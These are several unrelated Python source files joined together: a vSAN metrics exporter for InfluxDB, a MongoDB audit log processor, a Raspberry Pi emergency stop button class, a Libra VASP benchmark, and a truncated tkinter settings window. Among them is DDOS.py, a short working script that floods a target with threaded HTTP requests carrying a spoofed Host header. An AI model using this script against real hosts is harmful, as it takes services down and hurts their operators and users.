printInfluxLineProtocol(measurement, tags, fields, timestamp)
def parseHealth(test, value, tagsbase, timestamp):
measurement = 'health_' + test
tags = tagsbase
fields = {}
if value == 'green':
fields['health'] = 0
if value == 'yellow':
fields['health'] = 1
if value == 'red':
fields['health'] = 2
fields['value'] = '\"' + value + '\"'
printInfluxLineProtocol(measurement, tags, fields, timestamp)
def getCapacity(args, tagsbase, cluster_obj, vcMos, uuid, disks, vms):
vsanSpaceReportSystem = vcMos['vsan-cluster-space-report-system']
try:
spaceReport = vsanSpaceReportSystem.VsanQuerySpaceUsage(
cluster=cluster_obj
)
except vmodl.fault.InvalidArgument as e:
print("Caught InvalidArgument exception : " + str(e))
return
except vmodl.fault.NotSupported as e:
print("Caught NotSupported exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
timestamp = int(time.time() * 1000000000)
parseCapacity('global', spaceReport, tagsbase, timestamp)
parseCapacity('summary', spaceReport, tagsbase, timestamp)
if spaceReport.efficientCapacity:
parseCapacity('efficientcapacity', spaceReport, tagsbase, timestamp)
for object in spaceReport.spaceDetail.spaceUsageByObjectType:
parseCapacity(object.objType, object, tagsbase, timestamp)
# Get informations about VsanClusterBalancePerDiskInfo
vsanClusterHealthSystem = vcMos['vsan-cluster-health-system']
try:
clusterHealth = vsanClusterHealthSystem.VsanQueryVcClusterHealthSummary(
cluster=cluster_obj
)
except vmodl.fault.NotFound as e:
print("Caught NotFound exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
for disk in clusterHealth.diskBalance.disks:
measurement = 'capacity_diskBalance'
tags = tagsbase
tags['uuid'] = disk.uuid
tags['hostname'] = disks[disk.uuid]
fields = {}
fields['varianceThreshold'] = clusterHealth.diskBalance.varianceThreshold
fields['fullness'] = disk.fullness
fields['variance'] = disk.variance
fields['fullnessAboveThreshold'] = disk.fullnessAboveThreshold
fields['dataToMoveB'] = disk.dataToMoveB
printInfluxLineProtocol(measurement, tags, fields, timestamp)
def getHealth(args, tagsbase, cluster_obj, vcMos,):
vsanClusterHealthSystem = vcMos['vsan-cluster-health-system']
try:
clusterHealth = vsanClusterHealthSystem.VsanQueryVcClusterHealthSummary(
cluster=cluster_obj
)
except vmodl.fault.NotFound as e:
print("Caught NotFound exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
timestamp = int(time.time() * 1000000000)
for group in clusterHealth.groups:
splitGroupId = group.groupId.split('.')
testName = splitGroupId[-1]
parseHealth(testName, group.groupHealth, tagsbase, timestamp)
def isFilesExist(listFile):
result = True
for file in listFile:
if not os.path.isfile(file):
result = False
return result
def isTTLOver(listFile, TTL):
result = True
for file in listFile:
if os.path.isfile(file):
filemodificationtime = datetime.fromtimestamp(os.stat(file).st_mtime) # This is a datetime.datetime object!
now = datetime.today()
max_delay = timedelta(minutes=TTL)
if now - filemodificationtime < max_delay:
result = False
return result
def isHostsConnected(cluster, witnessHosts, si):
result = True
for host in cluster.host:
if not host.summary.runtime.connectionState == 'connected':
result = False
for witnesshost in witnessHosts:
host = (vim.HostSystem(witnesshost.host._moId, si._stub))
if not host.summary.runtime.connectionState == 'connected':
result = False
return result
def pickelDumpObject(object, filename):
fileObject = open(filename, 'wb')
pickle.dump(object, fileObject)
fileObject.close()
def pickelLoadObject(filename):
if os.path.isfile(filename):
fileObject = open(filename, 'rb')
object = pickle.load(fileObject)
return object
else:
print("Can't open cache file : " + filename)
return -1
# Gather informations about uuid, disks and hostnames
# Store them in cache files if needed
def manageData(args, si, cluster_obj, vcMos):
vsanVcStretchedClusterSystem = vcMos['vsan-stretched-cluster-system']
# Witness
# Retrieve Witness Host for given VSAN Cluster
witnessHosts = vsanVcStretchedClusterSystem.VSANVcGetWitnessHosts(
cluster=cluster_obj
)
# Build cache's file names
uuidfilename = os.path.join(args.cachefolder, 'vsanmetrics_uuid-' + args.clusterName + '.cache')
disksfilename = os.path.join(args.cachefolder, 'vsanmetrics_disks-' + args.clusterName + '.cache')
vmsfilename = os.path.join(args.cachefolder, 'vsanmetrics_vms-' + args.clusterName + '.cache')
listFile = (uuidfilename, disksfilename, vmsfilename)
# By default, don't rebuild cache
rebuildcache = False
# Test if all needed cache files exists, if all hosts are connected and if TTL of the cache is not over
resultFilesExist = isFilesExist(listFile)
resultHostConnected = isHostsConnected(cluster_obj, witnessHosts, si)
resultTTLOver = isTTLOver(listFile, args.cacheTTL)
# Make decision if rebuilding cache is needed
if not resultFilesExist and not resultHostConnected:
print("One or more host disconnected. Can't continue")
return
else:
if not resultFilesExist and resultHostConnected:
rebuildcache = True
elif resultFilesExist and resultHostConnected and not resultTTLOver:
rebuildcache = False
elif resultFilesExist and resultHostConnected and resultTTLOver:
rebuildcache = True
if rebuildcache:
# Rebuild cache
# Get uuid/names relationship informations for hosts and disks
uuid, disks = getInformations(witnessHosts, cluster_obj, si)
# Get VM uuid/names
vms = getVMs(cluster_obj)
pickelDumpObject(uuid, uuidfilename)
pickelDumpObject(disks, disksfilename)
pickelDumpObject(vms, vmsfilename)
else:
# Load data from cache
uuid = pickelLoadObject(uuidfilename)
disks = pickelLoadObject(disksfilename)
vms = pickelLoadObject(vmsfilename)
return uuid, disks, vms
def getPerformance(args, tagsbase, si, cluster_obj, vcMos, uuid, disks, vms):
vsanPerfSystem = vcMos['vsan-performance-manager']
# Gather a list of the available entity types (ex: vsan-host-net)
entityTypes = vsanPerfSystem.VsanPerfGetSupportedEntityTypes()
# query interval, last 10 minutes -- UTC !!!
endTime = datetime.utcnow()
startTime = endTime + timedelta(minutes=-10)
splitSkipentitytypes = []
if args.skipentitytypes:
splitSkipentitytypes = args.skipentitytypes.split(',')
result = ""
for entities in entityTypes:
if entities.name not in splitSkipentitytypes:
entitieName = entities.name
labels = []
# Gather all labels related to the entity (ex: iopsread, iopswrite...)
for entity in entities.graphs:
for metric in entity.metrics:
labels.append(metric.label)
# Build entity
entity = '%s:*' % (entities.name)
# Build spec object
spec = vim.cluster.VsanPerfQuerySpec(
endTime=endTime,
entityRefId=entity,
labels=labels,
startTime=startTime
)
# Get statistics
try:
metrics = vsanPerfSystem.VsanPerfQueryPerf(
querySpecs=[spec],
cluster=cluster_obj
)
except vmodl.fault.InvalidArgument as e:
print("Caught InvalidArgument exception : " + str(e))
return
except vmodl.fault.NotFound as e:
print("Caught NotFound exception : " + str(e))
return
except vmodl.fault.NotSupported as e:
print("Caught NotSupported exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
except vmodl.fault.Timedout as e:
print("Caught Timedout exception : " + str(e))
return
except vmodl.fault.VsanNodeNotMaster as e:
print("Caught VsanNodeNotMaster exception : " + str(e))
return
for metric in metrics:
if not metric.sampleInfo == "":
measurement = entitieName
sampleInfos = metric.sampleInfo.split(",")
lenValues = len(sampleInfos)
timestamp = convertStrToTimestamp(sampleInfos[lenValues - 1])
tags = parseEntityRefId(measurement, metric.entityRefId, uuid, vms, disks)
tags.update(tagsbase)
fields = {}
for value in metric.value:
listValue = value.values.split(",")
fields[value.metricId.label] = float(listValue[lenValues - 1])
result = result + formatInfluxLineProtocol(measurement, tags, fields, timestamp)
print(result)
# Main...
def main():
# Parse CLI arguments
args = get_args()
# Initiate tags with vcenter and cluster name
tagsbase = {}
tagsbase['vcenter'] = args.vcenter
tagsbase['cluster'] = args.clusterName
try:
si, _, cluster_obj, vcMos = connectvCenter(args)
except Exception as e:
print("MAIN - Caught exception: " + str(e))
return
uuid, disks, vms = manageData(args, si, cluster_obj, vcMos)
threads = list()
# CAPACITY
if args.capacity:
x = threading.Thread(target=getCapacity, args=(args, tagsbase, cluster_obj, vcMos, uuid, disks, vms))
threads.append(x)
x.start()
# HEALTH
if args.health:
x = threading.Thread(target=getHealth, args=(args, tagsbase, cluster_obj, vcMos,))
threads.append(x)
x.start()
# PERFORMANCE
if args.performance:
x = threading.Thread(target=getPerformance, args=(args, tagsbase, si, cluster_obj, vcMos, uuid, disks, vms,))
threads.append(x)
x.start()
for _, thread in enumerate(threads):
thread.join()
return 0
# Start program
if __name__ == "__main__":
main()
|
DDOS.py
|
import socket
import threading
target = 'target ip'
fake_ip = '182.21.20.32'
port = 80
'''
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
'''
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
print("Attack number :",attack_num,"\n")
s.close()
for i in range(600):
thread = threading.Thread(target=attack)
thread.start()
attack_num = 0
|
log_processor.py
|
try:
import argparse
import configparser
import datetime
import json
import kerberos
import logging
import os
import pymongo
import re
import signal
import socket
import sys
import sys
import time
import threading
from pymongo.errors import DuplicateKeyError, OperationFailure, InvalidDocument
from bson.json_util import loads
except ImportError as e:
print(e)
sys.exit(1)
def write_resume_token(signum, frame):
if resume_token:
if sys.version_info[0] < 3:
p = format(time.mktime(resume_token.timetuple()), '.1f')
else:
p = datetime.datetime.timestamp(resume_token)
outfile = open(token_file, 'w')
outfile.write(p)
outfile.close()
logging.info("RESUME TOKEN: %s %s" % (resume_token, p))
logging.info("TERMINATING PROCESSING: %s" % datetime.datetime.now())
sys.exit(0)
# Thread for heartbeat
# Contains own MongoDB connection
def heartbeat(config_data, debug=False):
try:
if config_data['AUDIT_DB_SSL'] is True:
if debug is True:
logging.debug("Using SSL/TLS")
print("Using SSL/TLS")
if config_data['AUDIT_DB_SSL_PEM'] is not None:
client = pymongo.MongoClient(config_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=config_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_certfile=config_data['AUDIT_DB_SSL_PEM'], ssl_ca_certs=config_data['AUDIT_DB_SSL_CA'])
else:
client = pymongo.MongoClient(config_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=config_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_ca_certs=config_data['AUDIT_DB_SSL_CA'])
else:
if debug is True:
logging.debug("Not ussing SSL/TLS")
print("Not using SSL/TLS")
client = pymongo.MongoClient(config_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=config_data['AUDIT_DB_TIMEOUT'])
client.admin.command('ismaster')
except (pymongo.errors.ServerSelectionTimeoutError, pymongo.errors.ConnectionFailure) as e:
logging.error("Cannot connect to Audit DB, please check settings in config file: %s" %e)
print("Cannot connect to DB, please check settings in config file: %s" %e)
raise
heartbeat_db = client['logging']
heartbeat_collection = heartbeat_db['heartbeats']
try:
heartbeat_collection.insert_one({'host': config_data['DISPLAY_NAME'],'msg': 'STARTING PROCESSING', 'timestamp': datetime.datetime.now(), 'type': 'log processor'})
except OperationFailure as e:
print("""\033[91mHeartbeat Operational Error: %s\n\033[m""" % e)
logging.error("Heartbeat Operational Error: %s\n" % e)
while True:
try:
heartbeat_collection.insert_one({'host': config_data['DISPLAY_NAME'], 'timestamp': datetime.datetime.now(), 'type': 'log processor'})
time.sleep(config_data['HB_INTERVAL'])
except OperationFailure as e:
print("""\033[91mHeartbeat Operational Error: %s\n\033[m""" % e)
logging.error("Heartbeat Operational Error: %s\n" % e)
# global varible
resume_token = None
signal.signal(signal.SIGINT, write_resume_token)
signal.signal(signal.SIGTERM, write_resume_token)
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return datetime.timedelta(hours=1)
def get_cmd_args():
parser = argparse.ArgumentParser(description='Script to process MongoDB audit log')
parser.add_argument('--config','-c', dest='config_file', default=sys.path[0] + '/log_processor.conf', required=False, help="Alternative location for the config file")
parser.add_argument('--log','-l', dest='log_file', default=sys.path[0] + '/log_processor.log', required=False, help="Alternative location for the log file")
parser.add_argument('--token','-t', dest='token_file', default=sys.path[0] + '/.log_tokens', required=False, help="Alternative location for the toekn file (make it hidden)")
return parser.parse_args()
def get_config(args):
CONF_FILE = args.config_file
LOG_FILE = args.log_file
# Get config setting from `log_processor.config` file
if os.path.isfile(CONF_FILE) == False:
logging.basicConfig(filename=LOG_FILE,level=logging.ERROR)
logging.error('The config file must exist in the same directory as the Python script')
print('\033[93m' + 'The config file must exist in the same directory as the Python script, exiting' + '\033[m')
sys.exit(1)
config = configparser.ConfigParser()
config.read(CONF_FILE)
config_options = {}
try:
config_options['debug'] = config.getboolean('general','debug', fallback=False)
config_options['AUDIT_DB_CONNECTION_STRING'] = config.get('audit_db','connection_string')
config_options['AUDIT_DB_SSL'] = config.getboolean('audit_db','ssl_enabled',fallback=False)
if config_options['AUDIT_DB_SSL'] is True:
config_options['AUDIT_DB_SSL_PEM'] = config.get('audit_db','ssl_pem_path', fallback=None)
config_options['AUDIT_DB_SSL_CA'] = config.get('audit_db', 'ssl_ca_cert_path')
config_options['AUDIT_DB_TIMEOUT'] = config.getint('audit_db','timeout', fallback=10)
config_options['ELEVATED_OPS_EVENTS'] = config.get('general','elevated_ops_events',fallback='').split(',')
config_options['ELEVATED_CONFIG_EVENTS'] = config.get('general','elevated_config_events',fallback='').split(',')
config_options['ELEVATED_APP_EVENTS'] = config.get('general','elevated_app_events',fallback='').split(',')
config_options['AUDIT_LOG'] = config.get('general','audit_log',fallback=sys.path[0] + "/audit.log")
config_options['HB_INTERVAL'] = config.get('general','hb_interval', fallback=60)
config_options['DISPLAY_NAME'] = config.get('general','display_name', fallback=socket.gethostname())
except (configparser.NoOptionError,configparser.NoSectionError) as e:
logging.basicConfig(filename=LOG_FILE,level=logging.ERROR)
logging.error("The config file is missing data: %s" % e)
print("""\033[91mERROR! The config file is missing an option: %s.
It should be in the following format:
\033[92m
[audit_db]
connection_string=mongodb://auditor%%40MONGODB.LOCAL@audit.mongodb.local:27017/?replicaSet=repl0&authSource=$external&authMechanism=GSSAPI
timeout=1000
ssl_enabled=True
ssl_pem_path=/data/pki/mongod3.mongodb.local.pem
ssl_ca_cert_path=/data/pki/ca.ce\n
[general]
debug=true
audit_log=/data/logs/audit_log
elevated_config_events=shutdown,setParameter,setFeatureCompatibilityVersion,addShard,addShardToZone,balancerStart,balancerStop,enableSharding,flushRouterConfig,moveChunk,mergeChunks,removeShard,removeShardFromZone,setShardVersion,shardCollection,splitChunk,unsetSharding,updateZoneKeyRange,replSetReconfig,replSetInitiate
elevated_ops_events=createUser,deleteUser
elevated_app_events=dropCollection,dropDatabase
\033[m""" % e)
sys.exit(1)
return config_options
def create_tz_dtg(temp_time):
if sys.version_info[0] < 3:
utc_time = datetime.datetime.fromtimestamp(float(temp_time), UTC())
else:
utc_time = datetime.datetime.fromtimestamp(float(temp_time),datetime.timezone.utc)
return utc_time
def get_resume_token():
# Get resume token, is exists
if os.path.isfile(token_file):
try:
token_handle = open(token_file,'r')
temp_line = token_handle.readline().strip()
token = create_tz_dtg(temp_line)
except ValueError:
print('\033[91m' + "Incorrect format for timestamp: %s, reprocessing all data" % temp_line)
print('\033[m')
token = create_tz_dtg(0)
finally:
token_handle.close()
else:
token = create_tz_dtg(0)
return token
# Record our startup and config
def record_startup(config_array, debug=False):
if debug == True:
logging.info("STARTING PROCESSING: %s" % datetime.datetime.now())
logging.debug("AUDIT CONNECTION STRING: %s" % re.sub('//.+@', '//<REDACTED>@', config_array['AUDIT_DB_CONNECTION_STRING']))
logging.debug("AUDIT LOG: %s" % config_array['AUDIT_LOG'])
logging.debug("CONFIG EVENTS: %s" % config_array['ELEVATED_CONFIG_EVENTS'])
logging.debug("OPS EVENTS: %s" % config_array['ELEVATED_OPS_EVENTS'])
logging.debug("APP EVENTS: %s" % config_array['ELEVATED_APP_EVENTS'])
logging.debug("RESUME TOKEN: %s" % config_array['resume_token'])
print("AUDIT CONNECTION STRING: %s" % re.sub('//.+@', '//<REDACTED>@', config_array['AUDIT_DB_CONNECTION_STRING']))
print("AUDIT LOG: %s" % config_array['AUDIT_LOG'])
print("OPS EVENTS: %s" % config_array['ELEVATED_OPS_EVENTS'])
print("CONFIG EVENTS: %s" % config_array['ELEVATED_CONFIG_EVENTS'])
print("APP EVENTS: %s" % config_array['ELEVATED_APP_EVENTS'])
print("RESUME TOKEN: %s" % config_array['resume_token'])
else:
logging.info("STARTING PROCESSING: %s" % datetime.datetime.now())
# Connect to MongoDB
def audit_db_client(audit_db_data, debug=False):
try:
if audit_db_data['AUDIT_DB_SSL'] is True:
if debug is True:
logging.debug("Using SSL/TLS")
print("Using SSL/TLS")
if audit_db_data['AUDIT_DB_SSL_PEM'] is not None:
client = pymongo.MongoClient(audit_db_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=audit_db_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_certfile=audit_db_data['AUDIT_DB_SSL_PEM'], ssl_ca_certs=audit_db_data['AUDIT_DB_SSL_CA'])
else:
client = pymongo.MongoClient(audit_db_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=audit_db_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_ca_certs=audit_db_data['AUDIT_DB_SSL_CA'])
else:
if debug is True:
logging.debug("Not ussing SSL/TLS")
print("Not using SSL/TLS")
client = pymongo.MongoClient(audit_db_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=audit_db_data['AUDIT_DB_TIMEOUT'])
client.admin.command('ismaster')
except (pymongo.errors.ServerSelectionTimeoutError, pymongo.errors.ConnectionFailure) as e:
logging.error("Cannot connect to Audit DB, please check settings in config file: %s" %e)
print("Cannot connect to DB, please check settings in config file: %s" %e)
raise
db = client['logging']
collection = db['logs']
return collection
# check if our keys are valid for BSON
def clean_data(unclean_json, debug=False):
if type(unclean_json) is dict:
for k, v in unclean_json.items():
if debug:
logging.debug("KEY: %s" % k)
print("KEY: %s" % k)
if type(v) is dict:
v = clean_data(v, debug)
if type(v) is list:
v = clean_list_data(v, debug)
if k[0] in [ '$', '*'] and k not in ['$data', '$code', '$binary','$decimal128', '$int64', '$min_key','$max_key','$objectid','$regex', '$timestamp']:
if debug:
logging.debug("ISSUE: %s" % k)
print("""\03393mISSUE: %s\033[m""" % k)
unclean_json[k[1:]] = unclean_json.pop(k)
k = k[1:]
unclean_json[k.replace('.','_')] = unclean_json.pop(k)
return unclean_json
# Diving further down the rabbit hole
def clean_list_data(unclean_data, debug=False):
if type(unclean_data) is list:
for value in unclean_data:
if debug:
logging.debug("ELEMENT: %s" % value)
print("ELEMENT: %s" % value)
if type(value) is dict:
if debug:
logging.debug("ANOTHER DICT: %s" % value)
print("ANOTHER DICT: %s" % value)
unclean_data[unclean_data.index(value)] = clean_data(value, debug)
return unclean_data
def main():
global resume_token
global token_file
# get our config
args = get_cmd_args()
token_file = args.token_file
config_data = get_config(args)
# retrieve and add our resume token to the config data
# `resume_token` is a global variable so exit handlers can grab it easily
config_data['resume_token'] = get_resume_token()
resume_token = config_data['resume_token']
# setup logging
debug = config_data['debug']
if debug == True:
logging.basicConfig(filename=args.log_file,level=logging.DEBUG)
else:
logging.basicConfig(filename=args.log_file,level=logging.INFO)
#start heartbeats
hb = threading.Thread(target=heartbeat, args=(config_data, debug))
hb.daemon = True
hb.start()
# log our startup and the various settings
record_startup(config_data, debug)
# Connect to the mongodb database
audit_db = audit_db_client(config_data, debug)
# set for a new start or restart
restart = True
# if no audit file we will just wait to see if one turns up :-)
while os.path.isfile(config_data['AUDIT_LOG']) == False:
time.sleep(10)
f = open(config_data['AUDIT_LOG'], "rb")
# start reading our audit log
while 1:
where = f.tell()
line = f.readline()
if not line:
time.sleep(1)
f.seek(where)
else:
try:
# retrieve line
unclean_line = loads(line)
if config_data['debug']:
print("CURRENT TS: %s" % unclean_line['ts'])
# check if this was our last resume token or restart is not true
# On restart we do not want to process the same data again
if (unclean_line['ts'] > resume_token) or restart == False:
# we know we are now not in the restart for first start state, so declare that
restart = False
# clean line (if required) to remove some un-BSON key names
clean_line = clean_data(unclean_line, debug)
# retrieve the array of users so our subsequent querying is easier and faster
clean_line['users_array'] = []
for user_data in clean_line['users']:
clean_line['users_array'].append(user_data['user'])
# Insert tags as required
if ('command' in clean_line['param'] and clean_line['param']['command'] in config_data['ELEVATED_CONFIG_EVENTS']) or clean_line['atype'] in config_data['ELEVATED_CONFIG_EVENTS']:
clean_line['tag'] = 'CONFIG EVENT'
if 'command' in clean_line['param'] and clean_line['param']['command'] in config_data['ELEVATED_OPS_EVENTS']:
clean_line['tag'] = 'OPS EVENT'
elif 'command' in clean_line['param'] and clean_line['param']['command'] in config_data['ELEVATED_APP_EVENTS']:
clean_line['tag'] = 'APP EVENT'
clean_line['host'] = socket.gethostname()
clean_line['source'] = 'DATABASE AUDIT'
# set schema version
clean_line['schema_version'] = 0
# Get our newest resume token
resume_token = clean_line['ts']
if debug:
print(clean_line)
print("RESUME TOKEN: %s" % resume_token)
# insert data
audit_db.insert_one(clean_line)
else:
if debug is True:
print("Datestamp already seen: %s" % unclean_line['ts'])
logging.debug("Datestamp already seen: %s" % unclean_line['ts'])
except OperationFailure as e:
print("""\033[91mOperational Error: %s\nDocument: %s\033[m""" % (e, unclean_line))
logging.error("Operational Error: %s\nDocument: %s" % (e, unclean_line))
except ValueError as e:
print("""\033[91mValue Error: %s\nDocument: %s\033[m""" % (e, unclean_line))
logging.error("Value Error: %s\nDocument: %s" % (e, unclean_line))
continue
except InvalidDocument as e:
print("""\033[91mDocument Error: %s\nDocument: %s\033[m""" % (e, unclean_line))
logging.error("Document Error: %s\nDocument: %s" % (e, unclean_line))
continue
if __name__ == "__main__":
logger = logging.getLogger(__name__)
main()
|
EmergencyStopButton.py
|
"""
Zachary Cook
Class representing the hardware emergency stop button.
"""
# Channel of the Emergency Stop button (Pin 11).
EMERGENCY_STOP_CHANNEL = 17
import threading
import time
from Controller import Observer
# RPi is only on the Raspberry Pi.
from RPi import GPIO
"""
Class representing an emergency stop button.
"""
class EmergencyStopButton(Observer.Observable):
"""
Creates the emergency stop button.
"""
def __init__(self):
super().__init__()
self.lastState = False
# Set up the pins.
GPIO.setmode(GPIO.BCM)
GPIO.setup(EMERGENCY_STOP_CHANNEL,GPIO.IN,pull_up_down=GPIO.PUD_UP)
# Start polling the button pressing.
self.startPolling()
"""
Returns if the button is pressed.
"""
def isPressed(self):
return GPIO.input(EMERGENCY_STOP_CHANNEL)
"""
Starts the polling for the button presses.
"""
def startPolling(self):
# Performs polling.
def startPolling():
while True:
newButtonState = self.isPressed()
# Notify the observers if the state changed.
if newButtonState != self.lastState:
self.lastState = newButtonState
self.notify(newButtonState)
# Add an artificial delay for polling.
time.sleep(0.05)
# Create and start a thread for pulling.
threading.Thread(target=startPolling).start()
|
remote_benchmark.py
|
# Copyright (c) The Libra Core Contributors
# SPDX-License-Identifier: Apache-2.0
from ..business import VASPInfo, BusinessContext
from ..protocol import OffChainVASP
from ..libra_address import LibraAddress
from ..payment_logic import PaymentCommand, PaymentProcessor
from ..status_logic import Status
from ..storage import StorableFactory
from ..payment import PaymentAction, PaymentActor, PaymentObject, StatusObject
from ..asyncnet import Aionet
from ..core import Vasp
from ..crypto import ComplianceKey
from .basic_business_context import TestBusinessContext
import logging
import json
from mock import AsyncMock
from unittest.mock import MagicMock
from threading import Thread
import time
import asyncio
from aiohttp import web
import sys
from json import loads, dumps
import aiohttp
logging.basicConfig(
level=logging.ERROR, format="[%(levelname)s] %(asctime)s: %(message)s"
)
class SimpleVASPInfo(VASPInfo):
''' Simple implementation of VASPInfo. '''
def __init__(self, my_configs, other_configs, port=0):
self.my_configs = my_configs
self.other_configs = other_configs
self.port = port
def get_peer_base_url(self, other_addr):
protocol = 'https://' if self.port == 443 else 'http://'
base_url = self.other_configs['base_url']
port = self.port if self.port != 0 else self.other_configs['port']
return f'{protocol}{base_url}:{port}'
def get_peer_compliance_verification_key(self, other_addr):
return self.other_configs['key']
def get_my_compliance_signature_key(self, my_addr):
return self.my_configs['key']
def get_TLS_cert_path(self, other_addr):
host = self.other_configs['base_url']
return f'/home/ubuntu/{host}-nginx-selfsigned.crt'
def load_configs(configs_path):
''' Loads VASP configs from file. '''
with open(configs_path, 'r') as f:
configs = loads(f.read())
assert 'addr' in configs
assert 'base_url' in configs
assert 'port' in configs
assert 'key' in configs
bytes_addr = configs['addr'].encode()
configs['addr'] = LibraAddress.from_bytes(bytes_addr)
configs['port'] = int(configs['port'])
configs['key'] = ComplianceKey.from_str(dumps(configs['key']))
return configs
def run_server(my_configs_path, other_configs_path, num_of_commands=10, loop=None):
''' Run the VASP as server (do not send commands).
The arguments <my_configs_path> and <other_configs_path> are paths to
files describing the configurations of the current VASP and of the other
VASP, respectively. Configs are dict taking the following form:
configs = {
'addr': <LibraAddress>,
'base_url': <str>,
'port': <int>,
}
'''
my_configs = load_configs(my_configs_path)
other_configs = load_configs(other_configs_path)
my_addr = my_configs['addr']
other_addr = other_configs['addr']
# Create VASP.
vasp = Vasp(
my_addr,
host='0.0.0.0',
port=my_configs['port'],
business_context=AsyncMock(spec=BusinessContext),
info_context=SimpleVASPInfo(my_configs, other_configs),
database={}
)
logging.info(f'Created VASP {my_addr.as_str()}.')
# Run VASP services.
logging.info(f'Running VASP {my_addr.as_str()}.')
loop = asyncio.get_event_loop() if loop is None else loop
vasp.set_loop(loop)
vasp.start_services()
logging.info(f'VASP services are running on port {vasp.port}.')
def stop_server(vasp):
channel = vasp.vasp.get_channel(other_addr)
requests = len(channel.other_request_index)
while requests < num_of_commands:
requests = len(channel.other_request_index)
time.sleep(0.1)
vasp.close()
Thread(target=stop_server, args=(vasp,)).start()
try:
loop.run_forever()
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
def run_client(my_configs_path, other_configs_path, num_of_commands=10, port=0):
''' Run the VASP's client to send commands to the other VASP.
The VASP sends <num_of_commands> commands to the other VASP, on port <port>.
If <port> is 0, the VASP defaults to the port specified in <other_configs>.
Being able to easily modify the port allows to quickly test performance
in different situations, such as HTTP, HTTPS, or custom port.
The arguments <my_configs_path> and <other_configs_path> are paths to
files describing the configurations of the current VASP and of the other
VASP, respectively. Configs are dict taking the following form:
configs = {
'addr': <LibraAddress>,
'base_url': <str>,
'port': <int>,
}
'''
assert num_of_commands > 0
my_configs = load_configs(my_configs_path)
other_configs = load_configs(other_configs_path)
my_addr = my_configs['addr']
other_addr = other_configs['addr']
# Create VASP.
vasp = Vasp(
my_addr,
host='0.0.0.0',
port=my_configs['port'],
business_context=TestBusinessContext(my_addr),
info_context=SimpleVASPInfo(my_configs, other_configs, port),
database={}
)
logging.info(f'Created VASP {my_addr.as_str()}.')
# Run VASP services.
def start_services(vasp, loop):
vasp.start_services()
logging.debug('Start main loop.')
try:
loop.run_forever()
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
loop = asyncio.new_event_loop()
vasp.set_loop(loop)
t = Thread(target=start_services, args=(vasp, loop), daemon=True)
t.start()
logging.info(f'VASP services are running on port {vasp.port}.')
# Make a payment commands.
commands = []
for cid in range(num_of_commands):
sub_a = LibraAddress.from_bytes(b'A'*16, b'a'*8).as_str()
sub_b = LibraAddress.from_bytes(b'B'*16, b'b'*8).as_str()
sender = PaymentActor(sub_b, StatusObject(Status.none), [])
receiver = PaymentActor(sub_a, StatusObject(Status.none), [])
action = PaymentAction(10, 'TIK', 'charge', 994773)
reference = f'{my_addr.as_str()}_{cid}'
payment = PaymentObject(
sender, receiver, reference, 'orig_ref', 'desc', action
)
cmd = PaymentCommand(payment)
commands += [cmd]
# Send commands.
logging.info(
'Start measurements: '
f'sending {num_of_commands} commands to {other_addr.as_str()}.'
)
logging.info(
f'The target URL is {vasp.info_context.get_peer_base_url(other_addr)}'
)
start_time = time.perf_counter()
async def send_commands(vasp, commands):
return await asyncio.gather(
*[vasp.new_command_async(other_addr, c) for c in commands],
return_exceptions=True
)
res = asyncio.run_coroutine_threadsafe(send_commands(vasp, commands), loop)
res = res.result()
elapsed = (time.perf_counter() - start_time)
# Display performance and success rate.
success_number = sum([1 for r in res if r])
logging.info(f'Commands executed in {elapsed:0.2f} seconds.')
logging.info(f'Success #: {success_number}/{len(commands)}.')
logging.info(f'Estimate throughput #: {len(commands)/elapsed} TPS.')
|
settings_window.py
|
from tkinter import *
from tkinter import ttk, filedialog, messagebox
import threading
import json
import os
def reset_settings_window(win, download_btn, done_btn, _stabalize, apply_btn):
_stabalize[0] = 1
_stabalize[1] = 1
_stabalize[2] = 1
_stabalize[3] = 1
state = str(done_btn['state'])
if state == 'disabled':
download_btn.configure(state=ACTIVE)
setting = SettingsWindow()
setting.hold_variables(apply_btn, win)
class SettingsWindow(object):
"""
* Settings Window
"""
def __init__(self, version=None, download_btn=None, done_btn=None, stabalize=None): # we need these from the main file.
self.version = version
self.download_btn = download_btn
self.done_btn = done_btn
self._stabalize = stabalize
self._title = 'Settings | Gloryness | v{}'.format(self.version)
self._icon = 'images/#app.ico'
self._size = '550x370'
def on_settings(self):
thread = threading.Thread(target=self.settings)
thread.start()
def update_apply_button(self):
self.apply_btn.configure(state=NORMAL)
self.restore_settings.configure(state=NORMAL)
def update_apply_button_with_event(self, event):
self.apply_btn.configure(state=NORMAL)
self.restore_settings.configure(state=NORMAL)
if str(self.selenium_tab['state']) == 'disabled':
with open(self.name_of_json) as f:
self.data = json.load(f)
for key, value in self.data.items():
if key == 'settings_sync':
